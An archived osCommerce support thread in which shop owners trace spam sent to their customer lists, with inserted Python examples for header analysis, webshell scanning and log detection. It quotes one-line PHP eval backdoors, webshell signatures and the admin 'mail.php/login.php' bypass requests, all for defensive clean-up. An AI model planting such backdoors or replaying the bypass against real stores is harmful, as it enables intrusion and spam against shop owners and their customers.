
Spam Emails Being Sent


talbot649


You need to have one of your customers send you one of the emails, complete with COMPLETE header information. Analyze it. It is easy to put someone else's email address in the From: field on the envelope. You need to be certain that the emails are originating from your server. If they are, stop your email transport program, set options to send email to false, wipe your customer db, rename your admin folder.... do whatever you have to do to stop the emails. Then let's figure out how you were hacked. And a lot more information is going to be needed for anyone to assist.

 

Analyze your logs. Look in the access logs for access to files that don't appear to be a part of OSC. Look in ftp logs for someone uploading files other than yourself.

 

Start by looking in all your folders for files that don't belong. PHP files will stand out in an image folder, and that is a prime target for hackers to put things.

Then start looking in files for code that doesn't belong, especially in those php files that are designed to send email.

 

In all likelihood you will find files on your system that just don't belong there.

 

Install Site Monitor. Secure your admin folder. Rename your admin folder. You have a long job ahead of you and before you ever begin locate and protect your last known backup of your site files. You may have to wipe and restore.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

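The header check mdtaylorlrim asks for, as an added example (this is editor-supplied code, not something posted in the thread). The From: line is whatever the sender typed; the Received: lines are written by each relay as the message passes through, and the bottom-most one shows where the message first entered the mail system. The script walks them bottom-up and reports whether that first hop is the shop's own host. Both messages, the host names (shop.example, mx.customer-isp.example), the IPs and the userid are constructed for the example, not taken from the thread.

```python
# Added example (not from the original post): decide whether a spam sample
# really left the shop's server by walking its Received: headers, which the
# relays write themselves, instead of trusting the forgeable From: line.
import email
import email.utils
import re

# Constructed samples. "shop.example", "mx.customer-isp.example", the
# addresses and the userid are assumptions for the example.
# Sample 1: injected locally on the shop host (a "from userid N" hop written
# by the local MTA; on a real server compare N with the web-server account),
# then handed to the customer's mail exchanger.
VIA_SHOP = """Received: from shop.example (shop.example [203.0.113.10])
    by mx.customer-isp.example (Postfix) with ESMTP id 4F1A2
    for <customer@customer-isp.example>; Sat, 19 Dec 2009 12:44:06 +0100
Received: by shop.example (Postfix, from userid 48)
    id 1B2C3; Sat, 19 Dec 2009 12:44:05 +0100
From: sales@shop.example
To: customer@customer-isp.example
Subject: cheap insurance

buy now
"""

# Sample 2: From: forged as the shop, but the message reached the customer's
# MX directly from an unrelated IP; the shop never handled it.
FORGED = """Received: from [198.51.100.7] (unknown [198.51.100.7])
    by mx.customer-isp.example (Postfix) with ESMTP id 9Z8Y7
    for <customer@customer-isp.example>; Sat, 19 Dec 2009 12:50:00 +0100
From: sales@shop.example
To: customer@customer-isp.example
Subject: cheap insurance

buy now
"""


def received_hops(raw):
    """One dict per Received: header, top of message first.

    Relays prepend, so hops[0] is the relay nearest the recipient and
    hops[-1] is the first relay that ever handled the message.
    """
    msg = email.message_from_string(raw)
    hops = []
    for value in msg.get_all('Received', []):
        line = ' '.join(value.split())              # unfold continuation lines
        m_from = re.match(r'from\s+(\S+)', line)     # absent for local submission
        m_by = re.search(r'\bby\s+(\S+)', line)
        m_ip = re.search(r'\[([0-9a-fA-F.:]+)\]', line)
        m_uid = re.search(r'from userid (\d+)', line)
        hops.append({
            'from': m_from.group(1) if m_from else None,
            'ip': m_ip.group(1) if m_ip else None,
            'by': m_by.group(1) if m_by else None,
            'userid': m_uid.group(1) if m_uid else None,
        })
    return hops


def claimed_sender(raw):
    """The From: address, which proves nothing about where the mail came from."""
    return email.utils.parseaddr(email.message_from_string(raw)['From'])[1]


def sent_via_server(raw, our_hosts):
    """True if the earliest Received: hop names one of our own hosts."""
    hops = received_hops(raw)
    if not hops:
        return False
    first = hops[-1]
    ours = {h.lower() for h in our_hosts}
    return any((first[k] or '').lower() in ours for k in ('from', 'by'))


if __name__ == '__main__':
    for label, sample in (('via shop', VIA_SHOP), ('forged', FORGED)):
        print(label, claimed_sender(sample),
              sent_via_server(sample, {'shop.example'}), received_hops(sample)[-1])
```

Only the hops closest to the recipient can be trusted; anything below a hop written by a relay you do not control may itself be forged. If the first hop names your server and carries a local "from userid" clause, the mail was injected on the box, which is the case where the thread's clean-up advice applies.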


He's not the only one.. they got me last night too... I'll start looking.

 

FTP logs show no access for over a month. and site logs show only google bots from what i can tell. still looking


I have THE SAME PROBLEM. Just discovered it today. Spam sent from the (legitimate) address sales [at] hogueprophecy.com

I have located the culprit files. Some are PHP files; others I don't know what they are, ending in .dgo.

They are located in the oscommerce images folder. The ones in my images folder are named:

mix.dgo

xso.dgo

s99.php.orig ===== this one particularly nasty has total 0 permissions so I have to ask my server to delete it, can't do it myself.

wso.php.orig

 

and

 

.flex.php

.load.php

captcha_.php

mm.php

 

Question: I am running osCommerce Online Merchant v2.2 RC1. Do the bug fixes in the latest version of osCommerce fix security issues? If I install the latest version, will I also need to do something further to fix this security leak? Is this a brand new one, or is this addressed in the later versions?

thanks,

JSC, Boulder

Jamie/Boulder

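A scanner for the indicators this post and the replies above describe, as an added example (editor-supplied, not code from the thread or from osCommerce): non-image files under images/, hidden dotfiles such as .flex.php, leftover *.orig copies, and PHP whose body hands request data to eval() or a shell function. It builds a small constructed store tree in a temporary directory so it runs offline; the file names mirror the ones reported here, but the contents, the `$_POST['c']`/`$_POST['x']` keys and the signature list are assumptions for the example.

```python
# Added example (not from the original post): walk a store's document root
# and flag the indicators the thread keeps turning up. Paths, contents and
# the signature list are constructed for the example.
import re
import tempfile
from pathlib import Path

IMAGE_EXT = ('.jpg', '.jpeg', '.gif', '.png')
BACKUP_EXT = ('.orig', '.bak', '.old')
# Signatures typical of one-line PHP backdoors (assumed list, not exhaustive).
WEBSHELL_SIGS = [
    re.compile(rb'@?\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b', re.I),
    re.compile(rb'\b(?:system|passthru|shell_exec|exec)\s*\(\s*\$_(?:POST|GET|REQUEST)\b', re.I),
    re.compile(rb'\beval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(', re.I),
]


def reasons_for(root, path):
    """Return the reasons a file looks out of place (empty list if none)."""
    rel = path.relative_to(root).as_posix()
    name = path.name.lower()
    reasons = []
    if name.startswith('.'):
        reasons.append('hidden dotfile')
    if name.endswith(BACKUP_EXT):
        reasons.append('backup/editor copy left on a live site')
    if '/images/' in '/' + rel and not name.endswith(IMAGE_EXT):
        reasons.append('non-image file under images/')
    try:
        head = path.read_bytes()[:65536]      # enough for a dropped shell
    except OSError:
        head = b''
    if b'<?' in head:                          # only bother with PHP-looking bodies
        for sig in WEBSHELL_SIGS:
            if sig.search(head):
                reasons.append('webshell signature: ' + sig.pattern.decode()[:40])
                break
    return reasons


def scan_store(root):
    """Map relative path -> reasons, for every suspicious file under root."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob('*')):
        if path.is_file():
            why = reasons_for(root, path)
            if why:
                findings[path.relative_to(root).as_posix()] = why
    return findings


def build_sample_store(base):
    """Constructed osCommerce-like tree mixing clean files with dropped ones."""
    files = {
        'index.php': b"<?php require('includes/application_top.php'); ?>",
        'includes/functions/database.php':
            b"<?php function tep_db_connect() { return mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD); } ?>",
        'images/logo.gif': b'GIF89a',
        'images/mix.dgo': b'\x00\x01garbage',
        'images/s99.php.orig': b"<?php @eval($_POST['c']); ?>",      # key 'c' is a placeholder
        'images/.flex.php': b"<?php system($_GET['cmd']); ?>",
        'images/yahoo/index.php': b"<?php eval(gzinflate(base64_decode('...'))); ?>",
        'fly.php': b"test<?php @eval($_POST['x']);?>",               # key 'x' is a placeholder
    }
    for rel, body in files.items():
        target = Path(base) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)


def run_demo():
    """Build the sample tree, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_store(tmp)
        return scan_store(tmp)


if __name__ == '__main__':
    for rel, why in run_demo().items():
        print(rel, '->', '; '.join(why))
```

Point `scan_store()` at a real document root to use it; a hit on a file you did not put there is a reason to pull the whole site and restore from a backup older than the first suspicious log entry, since one dropped file is rarely the only one.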

found it...

 

Host: 74.220.219.147

/admin/mail.php/login.php?action=send_email_to_user

Http Code: 302 Date: Dec 18 01:27:02 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;)

 

/admin/mail.php?mail_sent_to=TEXT_ALL_CUSTOMERS&osCAdminID=7a4b2e9e9e92d13685d711e9df1c8187

Http Code: 302 Date: Dec 18 01:27:02 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;)

 

/admin/login.php

Http Code: 200 Date: Dec 18 01:27:02 Http Version: HTTP/1.1 Size in Bytes: 3331

Referer: -

Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;)

 

Ideas?


See the 'Serious Hole in Oscommerce' thread. Then read the 'How to secure your site' thread and fix your sites. Otherwise you'll end up with worse than spammed customer lists.

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!



Just checked - emails definitely coming from the site and it looks like this happening to a lot of people. I will work through the fixes and see if I can lock them out. I've got about 10 sites to manage too... :(

hor-i-zon



Where is the direct link to serious hole in security - because this just happened to me this morning too.. apparently there is someone out there exploiting this..

 

Also - Jami1955 where did you find these files I want to make sure I do not have them on mysite as well.


Seems that when I had my site redone by a local designer he left the 2 files that the secure his thread had mentioned NOT to leave on the site.. I have removed those and made changes per that thread.. we will see how it goes if we have any further issues.


Hi

 

I have the same problem today. The spammer sent out an email using [email protected] (which is not a valid email address) and included a link for a motor insurance company from Argentina!

 

I am looking through the site for "illegal" files and found an index.php in /images/yahoo/. I have now deleted the file.

 

Am still looking.

 

My ISP 50Webs.com is rubbish. They say "there is no way to see who has log in the database. No such logs are kept thus server will have serious problem storing so much data considering this is a shared web hosting platform."

 

Any other pointers would be greatly appreciated.

 

Thank you very much!

 

Kind regards,

 

Pei


The presence of the index.php file in a yahoo directory inside the images folder means that you have been hacked more seriously than simply an exploit on your customer list. The hacker has been able to place files in your site and by extension, will have been able to edit them too. You need to clean up your whole site. Cleaning up your site to eliminate every piece of code the hacker has placed that could let him back in won't be easy, although the Site Monitor addon would help. But quickest and easiest might be to delete the whole store including the database and restore from a known clean backup, and then immediately apply all necessary security measures as listed in this thread: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site. Of course if you use Site Monitor (link in that thread) to attempt to manually clean up the site you will still need to implement all the other security measures listed too.



Hi there,

 

Somehow, my customer database is being sent spam emails from the osCommerce store.

 

They are receiving it from [email protected] with links to pharmaceuticals. Can anyone help me clean it up?!

 

Many thanks for looking :)

 

 

Hi

 

I have encountered this as well on two sites I am involved in. By coincidence I found a file in the root of the installation that I didn't recognize. Don't know how it got there, but it might be some kind of XSS? (cross site scripting). On both sites the patterns are the same. It starts with a message sent using the contact form. The message has an invalid message header and the message body looks like junk.

 

The junk is sent:

xxx.xxx.xxx.xxx - - [08/Dec/2009:20:43:36 +0100] "POST /contact_us.php?action=send HTTP/1.1" 302 5

xxx.xxx.xxx.xxx - - [08/Dec/2009:20:43:38 +0100] "GET /contact_us.php?action=success HTTP/1.1" 200 14398

 

A file, fly.php is uploaded into the store root directory (the IP address in the upload process is the same on both sites and is done almost the same time):

66.96.128.60 - - [10/Dec/2009:03:05:34 +0100] "GET /fly.php HTTP/1.1" 404 37 "-" "-"

66.96.128.60 - - [10/Dec/2009:03:05:35 +0100] "POST /admin/file_manager.php/login.php?a=1&action=save HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

 

The spam is sent from one of the sites and it is sent from different IP addresses all the times:

xxx.xxx.xxx.xxx - - [19/Dec/2009:12:44:05 +0100] "POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 5 "-" "-"

xxx.xxx.xx.x - - [19/Dec/2009:16:21:18 +0100] "POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 5 "-" "-"

 

The fly.php is very small and is only one row. I have not yet found out what it can be used for:

test<?php @eval($_POST);?>

 

I do not know how to avoid this, and there might already be some solution to avoid this. So in the meantime I have changed the file name of admin/file_manager.php, and also changed the name of fly.php. Eventually I will receive more http requests for fly.php and it will be logged (just wish I knew how to use it to nail the bastard).

 

Br & merry xmas 2 all except the hacker

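A detector for the access-log pattern hkdude and persichini both show, as an added example (editor-supplied, not code from the thread). Every reported abuse in this thread is a POST to an admin script with an extra /login.php path segment appended: /admin/mail.php/login.php and /admin/file_manager.php/login.php. In osCommerce 2.2 the admin login check compares the basename of the requested script with login.php, so the trailing segment makes the check pass while the real script still runs; this is the hole the "serious hole" thread and FWR Media's application_top edit address. The script below parses combined-format lines, flags that shape regardless of which admin script is targeted, separates attempts that reached the script (2xx/302) from attempts that hit a renamed or protected admin directory (404, 401/403), and also flags a previously unknown script in the catalog root being served. The log lines, the documentation-range IPs and the list of known catalog scripts are constructed assumptions, not the thread's real addresses.

```python
# Added example (not from the original post): detect the admin PATH_INFO
# login-bypass requests reported in the thread and grade their outcome.
# Log lines are constructed in the combined format shown in the thread,
# with documentation-range IPs standing in for the real sources.
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_LOG = """\
198.51.100.23 - - [10/Dec/2009:03:05:34 +0100] "GET /fly.php HTTP/1.1" 404 37 "-" "-"
198.51.100.23 - - [10/Dec/2009:03:05:35 +0100] "POST /admin/file_manager.php/login.php?a=1&action=save HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
198.51.100.23 - - [10/Dec/2009:03:05:36 +0100] "POST /fly.php HTTP/1.1" 200 4 "-" "-"
203.0.113.77 - - [19/Dec/2009:12:44:05 +0100] "POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 5 "-" "-"
203.0.113.78 - - [27/Dec/2009:01:58:40 +0100] "POST /store/admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 404 - "-" "-"
192.0.2.5 - - [19/Dec/2009:12:50:00 +0100] "GET /admin/login.php HTTP/1.1" 200 3331 "-" "Mozilla/5.0"
192.0.2.9 - - [19/Dec/2009:13:00:00 +0100] "GET /product_info.php?products_id=12 HTTP/1.1" 200 14398 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# <admin dir>/<script>.php followed by more path (PATH_INFO): the script runs,
# but basename(PHP_SELF) now reads as the trailing segment.
PATHINFO_RE = re.compile(r'^(?P<prefix>.*/)?admin/(?P<script>[^/]+\.php)/(?P<extra>.+)$', re.I)
# Scripts that legitimately live in the catalog root (assumed partial list).
KNOWN_ROOT_SCRIPTS = {'index.php', 'product_info.php', 'contact_us.php', 'login.php',
                      'account.php', 'shopping_cart.php', 'checkout_shipping.php'}


def parse_line(line):
    """Combined-format line -> dict with ip, ts, method, path, query, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    parts = urlsplit(req['target'])
    req['path'], req['query'] = parts.path, parts.query
    req['status'] = int(req['status'])
    return req


def classify(req):
    """Finding string for a suspicious request, else None."""
    path, status = req['path'], req['status']
    m = PATHINFO_RE.match(path)
    if m:
        if status == 404:
            outcome = 'blocked: target not found (admin dir renamed or file gone)'
        elif status in (401, 403):
            outcome = 'blocked: access denied (.htaccess or similar)'
        else:
            outcome = 'reached admin script %s (status %d)' % (m.group('script'), status)
        return 'admin PATH_INFO login bypass attempt -> ' + outcome
    name = path.rsplit('/', 1)[-1]
    if path.count('/') == 1 and name.endswith('.php') \
            and name not in KNOWN_ROOT_SCRIPTS and 200 <= status < 300:
        return 'unknown script served from catalog root: ' + name
    return None


def analyze(lines):
    """Run every parsable line through classify() and keep the hits."""
    findings = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        why = classify(req)
        if why:
            findings.append({'ip': req['ip'], 'ts': req['ts'], 'method': req['method'],
                             'path': req['path'], 'status': req['status'], 'finding': why})
    return findings


def by_source(findings):
    """Group findings per client IP so one actor's sequence reads in order."""
    grouped = defaultdict(list)
    for f in findings:
        grouped[f['ip']].append(f)
    return dict(grouped)


if __name__ == '__main__':
    for ip, events in by_source(analyze(SAMPLE_LOG.splitlines())).items():
        print(ip)
        for e in events:
            print('  %s %s %s %d  %s' % (e['ts'], e['method'], e['path'], e['status'], e['finding']))
```

Read the grouped output as a timeline: a 404 probe for fly.php, a 302 from file_manager.php through the bypass, then a 200 for fly.php from the same address is the upload-then-use sequence hkdude describes. A 404 on the bypass path, as in the last sample line, is what you want to see after renaming the admin directory.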

Merry xmas to you too. Sorry to say that there will be more hacked files than the one you identified and you will need to take much more extensive measures to get rid of the hack and lock the hacker out. Find and implement all the security measures identified in the 'How to secure your site' thread. The hacker is using vulnerabilities that have been known about for quite a while now. The best way, if you can, is to delete the whole site then restore from a known clean back up and implement the measures. If you can't do this you will have to use the Site Monitor addon to identify all affected files and deal with them by either deleting them or removing the malicious code, and then implement all the needed measures.

 

The code in fly.php can allow the hacker to run any script they want on your server, by the way, if the eval function is enabled. Basically you don't control it, although you may think you do, they do.



Dear all,

 

my problem seems to be the one described by talbot649

 

Email headers indicate that spam was sent using my server (diagnosed as described by mdtaylorlrim).

 

Server logs indicate a couple of the access attempts as described by persichini (which are POST /admin/mail.php/login.php?action=send_email_to_user), even from that exact same IP address, 74.220.219.147. This IP resolves to Bluehost Inc., by the way, and has made only 6 access attempts to my site, which coincide (+/- a couple of minutes) with the times emails were sent / received. As described, the attacker seems to identify themselves as a googlebot.

As for the file names mentioned by jami1955, I did not find ANY of those. Furthermore, a comparison with a 2 months old Backup (via diff -r) showed no other changes than the ones performed by myself.

 

Neither did I find the file described by hkdude (containing <?php @eval($_POST);?>)

 

No "illegal" files came to my attention when manually checking. But after all, the backup might be infected already...? Note that my attention has as many loopholes as OSC itself.

 

I followed Ben Nevis's advice/link and edited admin/includes/application_top.php and includes/application_top.php following the instructions posted by FWR Media in the "serious hole" post

 

Also, I took some more security advices given by FWR media. Still, Ben Nevis'

"Otherwise you'll end up with worse than spammed customer lists." worries me.

 

Now, my 2 questions:

 

1. How can I test if I am really safe now?

2. I do not understand the hack. What could the attacker do or have done? Did the attacker have potential access to my whole database (in which other systems place their stuff as well), or could they even have the DB password?

 

Thank you very much for your help and I hope you can answer my two final questions. To all others affected and most of all the attacker: I have gipsy friends.


Quite possibly the attack was limited to sending spam to your customer list. No access to your 'whole' database is needed for that. It's not a sophisticated attack, it is a very simple one that can simply be avoided by changing your admin directory name, protecting it with .htaccess, and using FWR's mod to application_top. FWR's mod alone would do it, but these are not the only security measures you need to take because there are other known vulnerabilities as well. Even if you avoided being a victim of them this time round, you are running a very high risk that you will be a victim sooner or later if you do not apply all the measures listed in the 'How to secure your site' thread.



Hello, everyone.

 

I also have the same problem. I have checked with my hosting and they said they can restore a previous backup of my site. But I want to slowly figure out what makes this "spam" e-mail sending robot tick.

 

So basically I have done what was on the How to secure your site page, the serious hole found in osCommerce, security issue with admin directory, and I mean everything. Yes, I have banned the whole of Turkey as the .htaccess protection document stated.

 

Still, the question remains: How do I know that my site is safe now? Are the methods of "Securing your web site" enough to stop the already there "hack" of sending spam e-mails to customers?

 

I will continue to monitor my site and pay close attention to logs.


Yes, but so long as you have properly cleaned your site, hackers often leave backdoors.

 

To test your site generally there a number of programs that will scan your site for issues, a PCI scan is also basically doing that.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.


I have several osCommerce sites and they all have been hacked too, with the spam emails being sent to my customers. Some of the email addresses are fakes, but some are from legitimate email addresses that I have.

 

I have found .php files in the catalog/images folder along with the "yahoo" and "thumbs" folder in the catalog/images folder as well - which has me very worried. I also found "gd.php" and "feedback.php" files I didn't create in one store, the "fly.php" file in another store and one called "m.php" in a third store. I deleted these files right away.

 

I also logged into my database in phpMyAdmin. When I log in here I not only see my store's database, but another database as well that I did NOT create.

 

After deleting these .php files in the images folder and logging into my database and changing the password I now can no longer access the online store on the customer or admin side. I don't know if this is related to the hacking issue or the new password (I'm a novice). Here's the error that I get when I try to access the store:

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'my_db_user_name'@'not_revealed_ip_adress' (using password: YES) in /path_to_my_osc_shop/catalog/includes/functions/database.php on line 20

Unable to connect to database server!

 

I checked my permissions on everything and they are good, but I do have the filemanager.php file that I saw in the "secure your site" thread that was mentioned should be deleted.

 

Can anyone help me? I need someone to hold my hand through this because I'm not a code writer.

 

~ Liz


A reply directed to talbot649:

 

In your admin set "Allow guest to tell a friend" to false

 

Save it.

 

Someone has naively set that to true which allows any wandering spambot to send spam to everyone and their brother....

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >


Liz, if you change the DB password you have to also change the configure.php files (catalog and admin) to reflect the change where it says:

 

  define('DB_SERVER_PASSWORD', '');


Germ, thanks for this update. This is very helpful. I haven't been posting anything on this subject, but definitely feeling the pain that the rest of the osCommerce folks are experiencing. It's such a pain in the a*s. And the perception to our site owner customer, as well as the customers who are in the database, is that their info is compromised. But anyhow, this one entry seemed to make a lot of sense. I've removed all the fly.php and other php files, the day before Christmas, which didn't stop the emails. One little step at a time. Maybe this one item you've mentioned will put the icing on the bomb that stops these creeps in their tracks. THANKS AGAIN!


Can you give me some external links of PCI scanning tools? I tried searching but I'm afraid all those "free" scans will instead hack my account.


Ok, I was basically at the Latest Visitors monitor of cPanel, and this came in:

 

 

Host: 173-9-234-93-illinois.hfc.comcastbusiness.net

/store/admin/mail.php/login.php?action=send_email_to_user

Http Code: 404 Date: Dec 27 01:58:40 Http Version: HTTP/1.1 Size in Bytes: -

Referer: -

Agent: -

 

Does the line "Http Code: 404" mean that the attempt to send mail was not successful? I haven't received any spam mails yet.

 

If it is, how can I prevent the above from executing the same thing again?

 

I have installed everything regarding security and stuff. (see previous posts).


 

It was an attempt. It didn't work - the 404 error means the page wasn't found. It couldn't be found if you did all the recommended security stuff. You can't really prevent attempts, but you could set up IPTrap to block IP addresses of anyone looking for a directory named 'admin'.



Archived

This topic is now archived and is closed to further replies.
